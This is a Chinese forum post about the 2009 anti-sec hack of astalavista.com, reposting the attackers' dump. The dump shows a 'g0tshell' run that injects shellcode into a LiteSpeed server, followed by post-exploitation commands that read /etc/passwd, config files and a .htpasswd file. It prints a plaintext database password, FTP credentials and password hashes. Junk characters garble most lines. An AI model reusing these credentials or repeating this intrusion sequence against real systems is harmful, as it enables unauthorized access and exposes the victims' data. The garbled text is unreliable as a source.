里面两个亮点,一是远程获得apache用户权限的shell,banner是LiteSpeed,看来这玩意有0day,但是又怎么是用apache用户跑的,原来LiteSpeed这东西是和apache绑一起的,大概看了下介绍,主要功能是anti-ddos,这东西貌似还有点意思,回头玩玩。具体的看链接标记[url]http://www.litespeedtech.com/litespeed-web-server-features.html[/url]。
3 z { e1 {( ^& [" b+ a# J9 Y* M6 i" x
[root@front3 ~]# curl -I litespeedtech.com( x# B& j* M% _% B, F. L
HTTP/1.1 200 OK1 J! f2 g/ {, ]3 f
Date: Fri, 05 Jun 2009 22:54:51 GMT! Q. i c- A2 `+ c
Server: LiteSpeed
) Q9 D1 E8 V j8 c
' Y1 n2 i. D& p2 Y另外一个亮点就是localroot了,如果不是udev的话,那么就是RHEL5.3 x64还有一个localroot 0day -_-& ^) i: K. X( `8 `4 V; W
% M" g0 B9 `. T; X1 V( _
有人说astalavista被黑是因为Y拿milw0rm的东西赚钱,这个我觉得就是每个人的尺度问题,有人还把别人写的文章弄成自己写的,还有人把别人的程序改成自己的,多了去了。% V' `7 T! p6 a
9 G9 \" N; V U' V( ]9 i- S
2 {" X- X0 e. @1 Z/ f+ I4 |/ _ \ / _____/\__ ___/ _ \ | | / _ \ \ / /| |/ _____/\__ ___/ _ \
8 e9 B/ \( o6 `; k* f; Q/ /_\ \ \_____ \ | | / /_\ \| | / /_\ \ Y / | |\_____ \ | | / /_\ \2 E$ J6 m0 X. g4 o) P. h- A& D+ f2 _5 i
/ | \/ \ | |/ | \ |___/ | \ / | |/ \ | |/ | \
# M0 ^! D) C( l8 A; D" Y0 U7 H\____|__ /_______ / |____|\____|__ /_______ \____|__ /\___/ |___/_______ / |____|\____|__ /
4 S- |( S" y# n" j$ p: u) J \/ \/ \/ \/ \/ \/ \/$ a% {5 z5 I2 @8 S5 g$ ?& x6 _- [
The Hacking & Security Community
/ y- G6 W6 p+ \5 l5 U! r[+] Founded in 1997 by a hacker computer enthusiast% l3 P( T; e- A) T
[-] Exposed in 2009 by anti-sec group
0 Z2 _# S1 Z" q- L
! t: f/ L" c1 _4 EFrom < <b style=”color:black;background-color:#ffff66″>http</b>://<b style=”color:black;background-color:#ffff66″>astalavista</b>.<b style=”color:black;background-color:#ffff66″>com</b>/faq>:0 S6 ?- a: w5 ]/ ]4 G
>> 03. Who’s behind the site?1 d, s1 O) S- x6 t9 |2 R4 b: J0 f
>>) e b/ i% h# [
>> A team of security and IT professionals, and a countless number of contributors from all over the world.3 g6 L5 l- v) `2 V. {
! u' k! ?3 n' S1 y: F t>> 05. Is it true that the site is visited by script-kiddies and warez fans only?' Y5 f, v- l! p5 Z
>>
7 ^) X. y& o- u7 K+ t, i! b7 d L>> Absolutely not! The audience behind the site consists of home users, worldwide companies and corporations, educational and non-profit organizations, government and7 ^. y' Z' H' Y5 U
military institutions.
( ]5 P* j0 Y8 D' S0 u>> All of these have been visiting the site on a daily basis for the past couple of years, contributing in various ways, or requesting services and information.
' A+ Z/ \; N- L' x* n% g/ B N3 O* V2 v( M9 ]
Why has Astalavista been targeted?7 a1 _* h8 r) H/ N. L4 y, v8 ^
4 _! r9 U% n5 w8 M+ o. q6 s( nOther than the fact that they are not doing any of this for the “community” but& f! ^+ n; ?) p& p! Q$ i! G
for the money, they spread exploits for kids, claim to be a security community! S h5 u& P1 m
(with no real sense of security on their own servers), and they charge you $6.66
. j" u3 F- x- H9 Rper months to access a dead forum with a directory filled with public releases) n# ~8 Y- B0 s- b" ]
and outdated / broken services.
k7 }' _# d2 n1 d# s1 t0 L* l9 n7 y
We wanted to see how good that “team of security and IT professionals” really is.1 F8 k- c" L& D# v# G, d+ R! E
+ S& O/ \ b* \! `# N
Let’s begin.. X6 h" R* P7 S7 c! s
, ^# o; x3 Y# x, A' m
anti-sec:~# ./g0tshell astalavista.com -p 80
5 x" K9 e5 q: ^+ n/ J) [8 j @- Z+ g[+] Connecting to astalavista.com:80
( O( r+ z6 k& o1 `3 n5 t2 h[+] Grabbing banner…
/ C1 g! |( H3 XLiteSpeed
& ]: E( i" z" k- G7 P[+] Injecting shellcode…. N1 u" w! D8 P+ u
[-] Wait for it& B. A+ ?' _$ Z* Q
6 E4 O6 J' D* t9 C5 ?" v# `[~] We g0tshell
0 ^3 b% O6 J2 O) W: G7 Z0 x7 juname -a: Linux asta1.astalavistaserver.com 2.6.18-128.1.10.el5 #1 SMP Thu May 7 10:35:59 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux
2 ?; D8 a% @% u% P8 k ~ID: uid=100(apache) gid=500(apache) groups=500(apache)
2 c- l; o" o4 Q3 E+ h. |/ a) K9 i! | \/ w4 M& ?( p0 K+ V
sh-3.2$ cat /etc/passwd$ ?+ E- O9 ?: X) H7 Q! o
root:x:0:0:root:/root:/bin/bash; J! q D7 L5 {8 ?3 Y# S9 y5 o" C
bin:x:1:1:bin:/bin:/sbin/nologin0 b- W, F% q* p, e* [( O4 L
daemon:x:2:2:daemon:/sbin:/sbin/nologin9 e. \2 j( C e' i2 V: X
adm:x:3:4:adm:/var/adm:/sbin/nologin& u, {8 `5 E& ~$ }7 }% ?
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin' @% j6 S+ P/ ~# } C
sync:x:5:0:sync:/sbin:/bin/sync
- Q4 c9 z$ F7 C$ J Xshutdown:x:6:0:shutdown:/sbin:/sbin/shutdown- Q J1 q& N6 } t
halt:x:7:0:halt:/sbin:/sbin/halt4 L: ^0 t9 ]8 I, B( P6 l0 s
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
/ v6 l/ ~. A4 T9 g) k! a Gnews:x:9:13:news:/etc/news:
6 H( X5 n: h/ huucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
: y; A" p) M: ^4 ]2 Ooperator:x:11:0 perator:/root:/sbin/nologin
( c4 w6 c' L# G7 z* }2 U* _/ \games:x:12:100:games:/usr/games:/sbin/nologin
E S; f8 X8 l3 ^* dgopher:x:13:30:gopher:/var/gopher:/sbin/nologin
2 p/ L$ }3 F# Y0 L6 p$ u8 G" Aftp:x:14:50:FTP User:/var/ftp:/sbin/nologin+ Y P% ]. R5 _: c
nobody:x:99:99:Nobody:/:/sbin/nologin& @: t% |+ h- X- U" k5 ]
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
1 ~5 y( l7 v$ j1 _' n5 idbus:x:81:81:System message bus:/:/sbin/nologin
' a- {6 s6 V1 R3 x& hnscd:x:28:28:NSCD Daemon:/:/sbin/nologin
1 [, g3 q7 s% H- [- h' K nmailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
% s% d' G6 r% r0 c, Z* J; asmmsp:x:51:51::/var/spool/mqueue:/sbin/nologin. i- Z8 t b' t( G' n
vcsa:x:69:69:virtual console memory owner:/dev:/sbin/nologin
2 P- G. B4 f5 E& Ihaldaemon:x:68:68:HAL daemon:/:/sbin/nologin a2 u) t- A+ |7 I% d& ^; O5 M2 A
rpc:x:32:32 ortmapper RPC user:/:/sbin/nologin
9 }4 n# k1 Y; X9 o Orpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
7 v# A+ a# {' l( Z& S( p Snfsnobody:x:4294967294:4294967294:Anonymous NFS User:/var/lib/nfs:/sbin/nologin5 N1 \+ @7 x- L! P# a& T
sshd:x:74:74rivilege-separated SSH:/var/empty/sshd:/sbin/nologin
- ^) C4 A0 u% L" S( f- b. r0 Apcap:x:77:77::/var/arpwatch:/sbin/nologin
2 b# K4 e$ D& ynamed:x:25:25:Named:/var/named:/sbin/nologin
( S c/ _: W$ k* J: ~7 \apache:x:100:500::/var/www:/bin/false' S$ M# ~/ V3 K! x. C. ~. ~
diradmin:x:101:101::/usr/local/directadmin:/bin/bash
; b" N$ K. P+ e, Nmysql:x:102:102:MySQL server:/var/lib/mysql:/bin/bash# U7 m$ N4 A* z$ `* C
webapps:x:500:501::/var/www/html:/bin/bash
0 \! ~/ I! F1 E5 h6 K3 y; Zmajordomo:x:103:2::/etc/virtual/majordomo:/bin/bash
% R V0 n; O- l4 G2 |admin:x:501:502::/home/admin:/bin/bash/ f( y# @/ f2 ? o
jon:x:502:503::/home/jon:/bin/bash
0 Q- X* V! |& d$ ]$ Y7 e! jcom:x:503:504::/home/com:/bin/bash, B0 i! ?) ]# F+ @
ntp:x:38:38::/etc/ntp:/sbin/nologin* U8 B& v: \5 @. l3 f3 s; I0 B6 Y
ais:x:39:39penais Standards Based Cluster Framework:/:/sbin/nologin
" Q. y0 I2 Z7 X' q4 W. p8 nastanet:x:504:505::/home/astanet:/bin/bash
) b' C1 y: r) _; n7 Qavahi:x:70:70:Avahi daemon:/:/sbin/nologin
$ ^3 ^6 j* K3 F' w; K# }avahi-autoipd:x:104:103:avahi-autoipd:/var/lib/avahi-autoipd:/sbin/nologin
' E' n/ R% z/ i
" v+ p R" O, ]7 A' k( `) T& f( ash-3.2$ cat /etc/hosts4 x- r6 W' B" I0 u
# Do not remove the following line, or various programs
" e0 O: L' B- i; D* D# that require network functionality will fail.
' s$ r3 m" w% p. L* X& m7 Z& E127.0.0.1 localhost.localdomain localhost9 Y8 O. `6 u- h7 B
::1 localhost6.localdomain6 localhost6
+ ?) n6 `7 Z0 A9 T2 x( z80.74.154.172 asta1.astalavistaserver.com' s7 Q9 |; R) ]$ S9 h2 c [
( O2 v% Z9 \; s: P* }; M; {sh-3.2$ pwd
3 r: p6 z$ i: d; W- l6 t% R/ \/home/com/public_html& K" [/ i, T1 d o0 c* Y
4 _+ n. J- ^/ z* F
sh-3.2$ ls -la
: ?! n/ a1 T6 S3 ltotal 18460
6 s' X, h9 { B" L1 ndrwxr-xr-x 30 com apache 4096 May 28 17:06 .
; O9 b3 v; w' m) G" udrwx–x–x 11 com com 4096 Jun 25 2008 ..
! L- {: b: l7 |& {! Z) N8 t0 _drwxr-xr-x 2 com com 4096 Feb 2 19:29 admin) t; I4 A1 t2 h6 u5 } g. A
drwxrwxrwx 2 com com 18591744 Jun 4 08:04 cache% O) F( ?) P/ B! d4 b
drwxr-xr-x 6 com com 4096 Mar 28 21:17 cadmin
+ N- g r) y m( V! d% gdrwxrwxrwx 2 com com 4096 May 19 00:50 config/ D+ F q% W) T5 j9 V
drwxr-xr-x 2 com com 4096 Mar 20 11:05 core( M* r, R8 t# {- M6 W
drwxr-xr-x 18 com com 4096 Feb 2 19:29 core_modules
+ b( s! V' r5 l$ {drwxr-xr-x 4 com com 4096 Feb 2 19:29 customizing. u$ T$ }" b1 V! A4 v7 |
drwxr-xr-x 2 com com 4096 May 11 13:24 customizing_paulo, S# h. s5 c) }+ O
drwxr-xr-x 6 com com 4096 Mar 30 12:28 __DELETE__$ q1 N$ A( u0 ]6 ^- l; D
-rw-r–r– 1 com com 8035 May 19 14:26 directory_to_mediadir.php6 ?+ t; c; m- C) O2 A
drwxr-xr-x 2 com com 4096 Sep 9 2008 dvd
5 H, C) O5 x5 U8 X2 }, n7 Xdrwxr-xr-x 3 com com 4096 Feb 2 19:29 editor
, d/ J- ^' b0 @% G* K-rw-r–r– 1 com com 3750 Feb 27 16:12 favicon.ico
" r) S% z3 A* tdrwxrwxrwx 2 com com 4096 Jun 4 08:00 feed
0 D, _6 q/ w* Q-rwxrwxrwx 1 com com 10736 May 29 12:44 .htaccess
: V) K% S) T) h& W+ U" b3 y, g-rw-r–r– 1 com com 7638 Apr 21 08:45 .htaccess.2009-04-21.bak
4 _1 F! C! w, l) @-rw-r–r– 1 com com 10768 May 11 11:53 .htaccess.2009-05-11.bak
. Y( y: e% E3 N; o! ^drwxr-xr-x 18 com com 4096 Apr 9 2008 ideapool$ B9 X6 ]3 v0 \. R: ?, } w
drwxrwxrwx 14 com com 4096 Feb 2 19:29 images
9 t4 C+ B3 z) e/ O! q-rw-r–r– 1 com com 97496 Jun 2 13:01 index.php
' e- f* ?# I. ~3 ?; Xdrwxr-xr-x 6 com com 4096 Feb 2 19:29 installer& ~# ]$ B4 O0 G o9 \5 P" l9 C
drwxr-xr-x 8 com com 4096 Feb 2 19:29 lang
' ?8 \# Z8 s7 H% ^drwxr-xr-x 22 com com 4096 Feb 2 19:29 lib$ m: k3 ^# g5 a( T0 m1 F' p
drwxrwxrwx 12 com com 4096 Jun 2 07:47 media
/ S. u+ i8 S7 z" x- K5 @- Z' O; }drwxr-xr-x 8 com com 4096 May 11 12:48 modifications
' h b/ b2 K8 H% w/ b: X, l' Fdrwxr-xr-x 34 com com 4096 May 28 16:30 modules" J. E8 t) b" h3 A8 G6 e! r2 v& a
drwxr-xr-x 11 com com 4096 Jan 30 15:00 _myAdmin7 o! h/ y( ]3 G- t: e: X
drwxrwxr-x 22 com com 4096 May 28 17:06 _new
1 j- O" ^0 q( N3 z' y) j7 X3 M1 y) Ddrwxr-xr-x 26 com com 4096 Feb 2 19:27 _old
, E: m. u5 w3 L9 xdrwxr-xr-x 2 com com 4096 Mar 30 12:29 phproxy
/ y2 a1 u: u% h2 @+ o, Idrwxr-xr-x 2 com com 4096 Mar 30 12:30 proxy: F, e+ Z! k" i2 q- d7 I
-rw-r–r– 1 com com 26 Feb 2 19:33 robots.txt! X$ e' ]5 w( U* L, v
-rwxrwxrwx 1 com com 10844 Jun 2 09:50 sitemap.xml
4 G. w: r3 W2 s, E" \" { n-rw-r–r– 1 com com 223 Mar 30 15:32 test.php
0 b: S$ b9 X8 v# }8 D! \0 q8 a% ldrwxrwxrwx 8 com com 4096 Mar 6 13:15 themes
( r1 A! G$ T' rdrwxrwxrwx 3 com com 4096 Jun 4 08:00 tmp" [% K" n: M) |5 F" @& ~/ k
drwxr-xr-x 3 com com 4096 Feb 2 19:33 webcam- B. O; f3 z/ t! t# v$ R+ s* l
( m9 R% [7 D4 y8 R. X' A q/ z" i
sh-3.2$ head -20 index.php2 ?- x ?0 m" f0 w5 N; K
<?php: s8 N: i+ w# v" a' R( j5 t
0 G- t, W& p3 F' ]; o/**
3 e) E% }3 S4 S1 C- U% Z9 v# N* The main page for the CMS
' l3 ?% o, ~, M0 \* @copyright CONTREXX CMS - COMVATION AG
/ l L' |) C" `! z1 {3 T5 \* @author Comvation Development Team e! `/ T, v9 x& h
* @version v1.0.9.10.1 stable
, M$ e- h& C4 x9 |. q( Q/ }4 p* @package contrexx$ d& q. w9 K9 ?) f4 n+ j) o' W4 W
* @subpackage core
o9 j+ w7 M! [2 J3 `' u* @link 链接标记[url]http://www.contrexx.com/[/url] contrexx homepage
4 Q# E6 n0 @; j- A' K8 ?% H0 R* @since v0.0.0.03 h2 z* e) v" D+ ^5 Z4 a/ U6 v
* @todo Capitalize all class names in project$ a; z2 [0 e- n8 d: r; P
* @uses /config/configuration.php/ k, Q# A( x7 c4 K
* @uses /config/settings.php" O! Q" ?4 K/ J4 E
* @uses /config/version.php
, z, ]( S" D! O& m' e3 p* l5 l5 r7 J* @uses /core/API.php" D& J y% U& T0 l( i
* @uses /core_modules/cache/index.class.php9 n- x- ~ \) q/ E8 O8 G
* @uses /core/error.class.php2 E) }3 }/ o/ q
* @uses /core_modules/banner/index.class.php3 e* L8 k! h! }2 n, Z/ L( G
* @uses /core_modules/contact/index.class.php0 |4 E6 U9 h7 H2 b6 ^) g) @
0 y4 b2 j9 N& G! \. L
sh-3.2$ cd config/4 j: @9 @/ J# r
sh-3.2$ ls -la
! }# p3 w2 |4 ? D: R Btotal 328 n$ p4 z; _3 @& O. A1 D+ u9 T8 n- v# o& {- F
drwxrwxrwx 2 com com 4096 May 19 00:50 .
) v+ H% _* d& e. W2 Ndrwxr-xr-x 30 com apache 4096 May 28 17:06 ..; s4 L% a+ ?, d/ X1 E" e S
-rwxrwxrwx 1 com com 2998 May 11 12:29 configuration.php1 q" o B( m' [- h8 j
-rwxrwxrwx 1 com com 7610 May 28 17:27 set_constants.php
0 l) j, Z! P' C% { E( S. D! ]; N-rwxrwxrwx 1 com com 4186 May 25 12:54 settings.php) C2 t- z9 {3 ?3 ^+ a$ f9 H
-rwxrwxrwx 1 com com 672 Feb 2 19:29 version.php
$ I8 ]) ]- E; l# B5 D0 k& N, n. T; n4 c
sh-3.2$ cat configuration.php
5 T( b8 J* L; {, t9 B[snip]
' f4 X l4 m. v( p$_DBCONFIG['host'] = ‘localhost’; // This is normally set to localhost, A; n0 X7 H* Z: X" E4 S
$_DBCONFIG['database'] = ‘com_contrexx2_live’; // Database name/ a- U! Q' F: d
$_DBCONFIG['tablePrefix'] = ‘contrexx_’; // Database table prefix2 d" Q0 m6 O7 K
$_DBCONFIG['user'] = ‘contrexxuser2′; // Database username
$ o6 a' r' d$ s" C$_DBCONFIG['password'] = ‘0fEYNZgXz1pKe’; // Database password3 U/ N& Z" `! |, u! Z% [
$_DBCONFIG['dbType'] = ‘mysql’; // Database type (e.g. mysql,postgres ..)$ G- D- W/ a# y. v2 O4 F* }' u
$_DBCONFIG['charset'] = ‘utf8′; // Charset (default, latin1, utf8, ..)
- S! M9 n( |# |) [% u* ~- o. E[snip]7 F& J. K$ d5 p6 b- V2 I j
$_FTPCONFIG['is_activated'] = true; // Ftp support true or false
7 K9 L$ `- t- S$_FTPCONFIG['use_passive'] = true; // Use passive ftp mode
4 u) k. F* q8 \4 Y# ]$_FTPCONFIG['host'] = ‘localhost’;// This is normally set to localhost
$ c- J% S( _/ _; M, W# B$_FTPCONFIG['port'] = 21; // Ftp remote port/ o X! i2 p# L* }; Z
$_FTPCONFIG['username'] = ‘链接标记dev@astalavista.com’; // Ftp login username- a& k% N% t1 Z0 V" G! ^* @; ~5 U
$_FTPCONFIG['password'] = ‘jajklop0Iuj’; // Ftp login password6 ?+ ?; T/ Q$ u0 M; \
$_FTPCONFIG['path'] = ‘/’; // Ftp path to cms
# K$ p1 l% O- P1 E4 C" h5 c4 j0 I* h" p& [2 d8 U
sh-3.2$ cd ..7 H% \* e4 ~7 V1 K: I" m
sh-3.2$ cd dvd/
8 _' w" v- v6 R( Q+ C2 Ksh-3.2$ ls -la
3 B, n4 }- E: N" Ztotal 2913780
0 D9 K) r& f, V! \7 Z; vdrwxr-xr-x 2 com com 4096 Sep 9 2008 .3 d5 J, H+ ?# \' n! I* t
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..# \# A3 l. c& y, s6 o
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part1.rar; C }6 A6 N7 z
-rw-r–r– 1 com com 1050061483 May 16 2008 astalavista_security_toolbox_dvd_2008.part2.rar; L3 Z6 ?' s- r" O( h5 ]
-rw-r–r– 1 com com 880644069 May 16 2008 astalavista_security_toolbox_dvd_2008.part3.rar
, p" j3 F. d: H3 q-rw-r–r– 1 com com 115 Jan 29 2008 .htaccess; F- F* J+ z8 r. ^( T2 T$ e
$ N; Y1 L" x8 ^" Vsh-3.2$ cat .htaccess
7 ~& T5 \* e$ {; b8 m6 GauthType Basic
% S+ ] x- W8 Q) j$ p6 F/ v8 ~authName DVD" q$ Q3 J' M' G. l1 J5 r+ } s/ w5 l7 U
authUserFile /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd
Z& Z" f# l5 _% B, }1 p' \require valid-user' ]& Y6 K& h5 S3 _. ^
) F+ M1 i, A) S2 `: R1 Jsh-3.2$ cat /home/com/domains/astalavista.com/.htpasswd/.htadm_pwd. t5 V% z4 P. }
DVDdownload:CRD8cuY6.MPT6 r5 t+ i! C+ y, N& t
DVDdownload2:CR8a36.wluFMg/ _$ K2 [6 Q1 Q! N
/ B9 q4 B# U- z5 k" K
sh-3.2$ cat test.php
, Q5 u6 [9 [0 u" q8 b/ h) I' t<?php% D |- W3 r7 x6 }* l8 F1 I3 Z
$url = ‘aHR0cDovL2kubnVzZWVrLmNvbS9pbWFnZXMvdGVtcGxhdGUvMzYweDMxOC9pc3QyXzc0Njc4MV9mZW1hbGVfc3R1ZGVudC5qcGc%3D’;
t/ h; H: g4 m* M$ u7 q$url = str_replace(array(’&’, ‘&’), ‘&’, base64_decode(rawurldecode($url)));
" B! Q, Q7 z0 v) T9 Lecho $url;
8 O& D* H- N5 c9 C?>! V$ x4 G( n5 V8 U4 l# Q
; |, ^+ t6 I5 a# ]' x
sh-3.2$ cd modifications/
1 i! b% _9 M- Q1 _- esh-3.2$ ls -la& i# U& d3 \3 _/ ^% o& f
total 32
8 m5 t( ]: ~ G+ ?drwxr-xr-x 8 com com 4096 May 11 12:48 .3 d8 U; P# ?- f" g( Q
drwxr-xr-x 30 com apache 4096 May 28 17:06 ..
+ Z9 l3 ]1 r A! l) C1 ]2 ndrwxr-xr-x 3 com com 4096 Feb 2 19:33 com_avtng
! g: ^ L6 [* @) hdrwxr-xr-x 3 com com 4096 May 12 09:26 cronjobs
% f+ p) B! \# E1 ?drwxr-xr-x 2 com com 4096 Mar 2 10:35 onlinetools/ m" V# }! J2 u# f
drwxr-xr-x 4 com com 4096 Feb 2 19:33 pjirc
4 y6 G$ D8 X" w/ \" cdrwxr-xr-x 2 com com 4096 Feb 2 19:33 search
/ r) J- V" _' T% `: Idrwxr-xr-x 2 com com 4096 Mar 25 08:56 _tmp
# ^: ~/ L1 X9 h; v. B; B
( ?; I1 |+ M+ C/ ^sh-3.2$ ls -R
2 c o/ j2 W' j.:
% s9 R% J% U( f( s. Ocom_avtng cronjobs onlinetools pjirc search _tmp( v2 Y2 j) l: j. [2 w& ~" b
, `7 D9 O. P6 m" T0 a; I./com_avtng:
; i; ?: \- y/ V5 R: C1 Q; u5 vavtng.php banner_bottom.inc.php banner_button.inc.php banner_content.inc.php banner_popunder.inc.php banner_right.inc.php banner_top.inc.php iframe.php scripts
9 l. t, D, Z) V/ ^! J0 O
# E$ w0 \# S$ o+ D7 ~9 Y./com_avtng/scripts:
- p% \. f% g) O$ Q7 W* Ipopunder.js7 K, U- [: N# ^6 o, e
' Z! K U0 G: M D3 A3 L" k
./cronjobs:
n7 _3 Z1 x, {! L) gexploits.php exploits.sh google_blogindexing.php ip2country.sh proxydb2.php proxydb.php securitynews.php tmp
! u" N/ \; q0 M5 D7 m: `; m7 m+ U1 S
./cronjobs/tmp:) h Q4 F. ?1 `/ c# ]/ O
contrexx_module_onlinetools_defaultports.csv contrexx_module_onlinetools_geolitecity_country.csv
. ]! v6 e1 p0 T! T0 y; u3 `% m, H3 N* x2 J) X0 g6 ^( l
./onlinetools:
( j& u" j; P/ Bindex.php
- ^+ S" R! V" E* ?& H. M6 x) h
5 _) k) }: O, H9 n. ]./pjirc:
- ?0 i# t0 J! p- D0 ?6 _a_big.jpg english.lng img irc.jar NormalApplet.html pixx-french.lng pjirc.cfg securedirc-unsigned.cab thanks.txt
9 Z( |& m1 M# |AppletWithJS.html french.lng IRCApplet.class irc-unsigned.jar pixx.cab pixx.jar readme.txt SimpleApplet.html versions.txt) \$ S4 p, d) b2 p6 N1 u! r' Y: |. r
background.gif HeavyApplet.html irc.cab license.txt pixx-english.lng pixx-readme.txt securedirc.cab snd
! b! n# C. C+ F$ H0 g4 ^
( g0 e$ a% }) |+ D0 b# [! J./pjirc/img:8 z6 G* v' p, O8 C
ange.gif bombe.gif clin-oeuil.gif content.gif enerve2.gif garcon.gif langue.gif mecontent.gif ordi.gif portable.gif sapin.gif triste.gif4 z+ z# w0 P2 a4 |
arbre.gif bouche.gif clin-oeuil-langue.gif cool.gif femme.gif grognon.gif lettre.gif newbie.gif pere-noel.gif pouce-non.gif sleep.gif
, ~2 G' f% O0 V0 }( \verre-eau.gif
( ~ C2 i/ |& _) H [- Cargh.gif bouqin.gif coeur-brise.gif diable.gif fille.gif halloween.gif lit.gif OH-1.gif pleure.gif pouce-oui.gif soleil.gif
K! a1 z+ A1 Q2 D) J L3 O rverre-vin.gif( U6 ]. [8 e+ d
ballon.gif cadeau.gif coeur.gif dwchat.gif fleur.gif hamburger.gif love.gif OH-2.gif poisson.gif roll-eyes.gif sourire.gif yinyang.gif \' K3 M; y, O. a6 a- D
biere.gif chien.gif comprends-pas.gif enerve1.gif fume.gif homme.gif lune.gif OH-3.gif pomme.gif rouge.gif terre.gif$ y+ P& q* V* L# T& ]4 k
7 R# t ]. s& A& V$ d% u./pjirc/snd:
+ l: x# [% j D' u; Bbell2.au ding.au
8 S0 c. c, |& q1 b3 M/ T1 h& s% a- F' q
./search:* H) r* K% r, z7 t9 N/ h
searchEngines.php search.php
( g& e4 z0 q$ k+ M
' n: J" w S8 V2 m/ D3 _./_tmp:1 A V6 j0 N9 i, q1 U0 Z7 d
defaultPorts.php defaultPorts.txt
7 t) [- g# b) R, F4 j' A F
4 ?; W! \; k {) K- p) U4 _+ |sh-3.2$ cd cronjobs/
$ M' X6 H; _7 X) f4 F1 u- Z7 p. Ksh-3.2$ cat exploits.php7 x2 L( f- ]8 j. W! Q& a4 b8 a
[snip]9 o( W1 R4 P; p2 i1 F \* i$ S9 g3 W
$categories = array();
2 l* k n8 {3 ?# _$milw0rmFile = FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/sploitlist.txt’;
; _3 Q7 @# ~- B; _; U9 c% O5 O) e$expolits = file($milw0rmFile);0 v! q8 X8 A* ?) Z: q' g
$comExploits = array();9 q0 F3 c) o$ Y: ?# q
[snip]
. Y1 s& A3 G ~+ t2 s// manage data: t/ S& N6 a) @+ `
for ($x = 0; $x < count($expolits); $x++){ // count($expolits) - 26401 y2 {( M% ~8 p1 c/ U
8 _: _1 F5 \6 k1 _( @ // get path and title* D& f* ^7 A. n; q+ l
$expolits[$x] = trim($expolits[$x]);
4 M' y% L6 l' V D $path = str_replace(’./’, FULLPATH . ‘/modifications/cronjobs/tmp/milw0rm/’, substr($expolits[$x], 0, strpos($expolits[$x], ‘ ‘)));
) z- v. c; R3 u $title = htmlspecialchars(substr($expolits[$x], strpos($expolits[$x], ‘ ‘) + 1, strlen($expolits[$x])), ENT_QUOTES);- o' y0 m: T% X! ?( m7 `& e
/ _1 R {2 B# P6 v+ T/ J3 m3 X+ {
// check if file exists+ ~' ^ D7 a+ r1 I' |. N, G, D
if (file_exists($path)) {4 b) M6 z G: ^, w" O8 P
3 a M+ X" i; q, v+ F
$text = file_get_contents($path);
* {. q5 z2 {+ y5 m7 h
8 I/ `: Y( \( x% s // get content and date
1 K1 j- R4 Z+ ?& u' M0 j1 ` //$text = htmlspecialchars($text, ENT_QUOTES);
C$ G: M# l" e" A $tmptext = addslashes(htmlentities($text, ENT_QUOTES, “UTF-8″));
1 K9 q* o& M! H$ w' C if ($tmptext != ”) {: N2 H2 s! d, t# P
$text = $tmptext;
3 N' d3 H7 d) Q3 v } else {
" d6 i4 m0 `* F9 U6 I3 @7 u* I $text = addslashes(htmlentities($text, ENT_QUOTES));4 U. I8 O, s; L6 y
}$ ?6 D2 |0 G- W3 X J
$date = str_replace(’milw0rm.com [', '', str_replace(']‘, ”, strstr($text, ‘milw0rm.com [')));
1 t$ M- g+ w9 m- ?$ d( ] $tmp = explode('-', $date);
& R4 x0 C; h6 p7 E( }1 o* m" P $date = mktime(0, 0, 0, trim($tmp[1]), trim($tmp[2]), trim($tmp[0]));
( U2 G3 @0 n% w $cat = getCategory ($path);" k Y# w* I$ \9 _; x F% o- ^
$ext = pathinfo(basename($path)); s: j; H% K9 ^' u
$ext = $ext['extension'];
( T |' r" S! Z8 y, d* J! Q $qStr = ”
5 g& V9 k' m' o. d2 _ SELECT `id`
9 \' w' [5 f8 R FROM `contrexx_module_exploits`- `' Z' U+ `2 C$ T0 a
WHERE `title` = ‘” . $title . “‘
# y! R, H+ `0 @) d AND `date` = ‘” . $date . “‘
4 Z/ T* r z; [6 F0 g5 u- Z- k “;
% S$ c N- k7 Q+ s% A. O! H echo $x + 1 . ‘ von ‘ . count($expolits) . ‘ -> ‘ . $qStr . “\n”;
" T5 r* q/ E& i+ h+ P0 N6 p' y5 T7 R $q = $_objDB->query($qStr);# V. ?0 p8 W2 m6 r& C( z: o" y
* B6 P1 Q- Q' e3 `3 n4 x5 n8 f) y
if ($q->numRows() == 0) {
- T: @& C6 m3 I# `( q0 O2 f4 ?; M: E3 k- M
// prepare array
, p* R6 }" }! T $comExploits[$x]['date'] = $date;. J* U. Q" C& k* k7 Z
$comExploits[$x]['title'] = $title;
" p& b4 @; B- @ $comExploits[$x]['author'] = ‘milw0rm’;
( O8 K, @5 p7 B4 ^ $comExploits[$x]['text'] = $text;
5 B, d$ h6 T* Y. R. ^ $comExploits[$x]['source'] = $ext;
' w" |- {4 [, w r $comExploits[$x]['url1'] = ”;. l P6 a% N. _8 d' e' z3 z6 U
$comExploits[$x]['url2'] = ”;
, j6 }6 J) }3 Z+ V $comExploits[$x]['catid'] = $cat;2 }. ?8 G/ b% l0 n$ w: v
$comExploits[$x]['lang'] = ‘2′;
! y3 `" E: ~1 ?' Y! Z $comExploits[$x]['userid'] = ‘12′;/ ^( I, w9 a6 L4 C) ^
$comExploits[$x]['startdate'] = ‘0000-00-00′;
, k3 g m/ b# `* s $comExploits[$x]['enddate'] = ‘0000-00-00′; H2 q4 o0 D# u( c
$comExploits[$x]['status'] = ‘1′;1 \" Q+ p' K3 W% [ D
$comExploits[$x]['changelog'] = $date;8 [% h( H6 ^9 t2 Y' P& p; [
2 S+ p, I; Y: s) d9 b& Z6 M! i' V
}1 `) m2 L. J9 s6 B/ B
[snip]: Z& r# G6 L1 `7 F
$xml = ‘<?xml version=”1.0″ encoding=”UTF-8″?>
! ?/ ?/ d* E3 C<rss version=”2.0″>
' x* N% A& c+ u: x% M9 ^ <channel>5 ]$ {7 A9 [7 i0 ~8 d, v
<title>ASTALAVISTA.com - Exploits</title>
5 z/ V' W0 p4 N. E <link>http://www.astalavista.com/exploits</link>' W* r4 E* @0 I) V# ~. M
<description>All availably Exploits.</description>
- ^3 w/ K, p, y <language>en-us</language>
